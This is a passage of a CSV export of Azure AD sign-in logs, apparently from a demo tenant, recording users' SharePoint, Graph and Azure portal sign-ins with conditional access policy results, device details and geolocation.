'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 13:03,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",7688e8c0-f176-4f1e-95a2-c1fff1300e00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,7688e8c0-f176-4f1e-95a2-c1fff1300e00,SigninLogs,Sucess,41.90428925,-85.99833679
+1093,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,09:12.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,3673afe0-4b96-4670-a7cf-421078a2323b,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 13:09,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",fbcf3a57-b92a-4bcf-a38d-09fb8ec60d00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,fbcf3a57-b92a-4bcf-a38d-09fb8ec60d00,SigninLogs,Sucess,41.90428925,-85.99833679
+1094,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,10:22.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,f5eefa6e-81f8-41ed-9752-d2007ef10478,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 13:10,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",65ce963c-c870-4311-8389-19e547d50c00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,65ce963c-c870-4311-8389-19e547d50c00,SigninLogs,Sucess,41.90428925,-85.99833679
+1095,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,13:30.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,a1165b22-be1d-4e78-8b8a-73a0d8bbff2b,Microsoft.aadiam,Microsoft.aadiam,,Ashish Kapila,4,GB,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 13:13,"{'operatingSystem': 'Windows 10', 'deviceId': 'a8835158-f705-4014-a58f-5a04beb76aba', 'browser': 'Edge 80.0.361', 'displayName': 'MININT-15OQVR5', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",6ca6ad37-ac15-4817-96c8-b16b3e892c00,,,"{'countryOrRegion': 'GB', 'geoCoordinates': {'longitude': -0.9697200059890749, 'latitude': 51.445831298828125}, 'state': 'Reading', 'city': 'Reading'}",none,none,none,none,[],{'errorCode': 0},Ashish Kapila,61c20c19-6e81-4684-affc-fdb7086bb546,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,6ca6ad37-ac15-4817-96c8-b16b3e892c00,SigninLogs,Sucess,51.4458313,-0.969720006
+1096,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,12:42.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,7e7e44e0-ae88-4974-a662-dca1bd3eba49,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 13:12,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",99476ccd-67d1-454b-a7cf-079e20020e00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,99476ccd-67d1-454b-a7cf-079e20020e00,SigninLogs,Sucess,41.90428925,-85.99833679
+1097,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,12:42.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,7e7e44e0-ae88-4974-a662-dca1bd3eba49,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 13:12,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",99476ccd-67d1-454b-a7cf-079e20020e00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,99476ccd-67d1-454b-a7cf-079e20020e00,SigninLogs,Sucess,41.90428925,-85.99833679
+1098,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,11:27.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,1f9a3969-8e8a-4ad2-91ab-79bff8fae260,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,ACOM Azure Website,23523755-3a2b-41ca-9315-f81f3f566a95,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 13:11,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",cbc0f99c-7bef-40f5-9b26-c77d4ded0d00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,cbc0f99c-7bef-40f5-9b26-c77d4ded0d00,SigninLogs,Sucess,50.6406517,5.572050095
+1099,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,10:16.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,7cc9d4ba-ac6a-462d-94ba-f6e82e82f69c,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 13:10,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",65ce963c-c870-4311-8389-19e576d40c00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,65ce963c-c870-4311-8389-19e576d40c00,SigninLogs,Sucess,41.90428925,-85.99833679
+1100,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,10:20.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,64ec5f19-f7ba-429b-b134-b07d5b64a9cf,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': 